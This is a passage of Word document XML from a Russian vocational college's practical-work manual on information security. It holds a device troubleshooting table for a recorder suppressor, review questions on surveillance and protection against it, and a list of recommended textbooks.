              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123" w:right="42"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Прибор полностью работает, за исключением неисправных каналов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123" w:right="42"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Выключите питание прибора из сети 220В на одну минуту и включите заново, если</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123" w:right="194"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>неисправность сохранилась, то обратитесь к поставщику</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="311"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9903" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123" w:right="4562"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Индикатор ERROR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="727"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693"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Горит красным цветом</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Неисправность вторичного преобразователя ультразвуковых излучателей</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Прибор отключит УЗП. Все остальные режимы работают полностью</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126"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Обратитесь к поставщику</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A05281" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Контрольные вопросы для защиты практической работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A05281" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A05281">
        <w:t>Какие состояния индикаторов вам известны?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A05281" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A05281">
        <w:t>Как происходит установка и подключение прибора?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A05281">
        <w:t>Для чего используется подавитель диктофонов Бубен-ультра?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD712C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc3808636"/>
      <w:r w:rsidRPr="007B721A">
        <w:t>Вопросы для защиты  работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вопрос 1. Способы скрытого видеонаблюдения и съемки;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вопрос 2. Возможности средств оптико-электронной разведки;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вопрос 3. Методы и средства защиты от наблюдения и фотографирования. Виды информационной маскировки. (П)</w:t>
      </w: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pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc3808637"/>
      <w:r>
        <w:t>Список рекомендуемых источников</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основная литература:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.Белов Е.Б., Пржегорлинский В.Н. Организационно-правовое обеспечение информационной безопасности: учеб. пособие для СПО/ Е.Б. Белов, В.Н. Пржегорлинский .-М.: ИЦ «Академия», 2017.- 336с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Информационная безопасность компьютерных систем и сетей</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: Учебное пособие / Шаньгин В. Ф. - М.: ИД ФОРУМ, НИЦ ИНФРА-М, 2016. - 416 с.: 60x90 1/16. - (Профессиональное образование) (Переплёт 7БЦ) ISBN 978-5-8199-0331-5 - Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId94" w:history="1">
        <w:r w:rsidRPr="00B45DB0">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://znanium.com/catalog/product/549989</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3. Информационная безопасность компьютерных систем и сетей</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> : учеб. пособие / В.Ф. Шаньгин. — М. : ИД «ФОРУМ» : ИНФРА-М, 2018. — 416 с. — (Среднее профессиональное образование). - Режим доступа:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidRPr="00B45DB0">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://znanium.com/catalog/product/945331</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дополнительная литература:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="0"/>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Основные положения информационной безопасности</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: Учебное пособие/В.Я.Ищейнов, М.В.Мецатунян - М.: Форум, НИЦ ИНФРА-М, 2015. - 208 с.: 60x90 1/16. - (Профессиональное образование) (Обложка) ISBN 978-5-00091-079-5 - Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:history="1">
        <w:r w:rsidRPr="00B45DB0">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://znanium.com/catalog/product/508381</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="0"/>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Безопасность и управление доступом в информационных системах</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> : учеб. пособие / А.В. Васильков, И.А. Васильков. — М. : ФОРУМ : ИНФРА-М, 2017. — 368 с. — (Среднее профессиональное образование). - Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId97" w:history="1">
        <w:r w:rsidRPr="00B45DB0">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://znanium.com/catalog/product/537054</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:overflowPunct w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="003E46EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ПРОФЕССИОНАЛЬНОГО ОБРАЗОВАНИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:overflowPunct w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E46EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«СТАВРОПОЛЬСКИЙ МНОГОПРОФИЛЬНЫЙ КОЛЛЕДЖ»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:overflowPunct w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E46EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3660"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3660"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00E922C7" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00E922C7" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E922C7">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Методические указания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
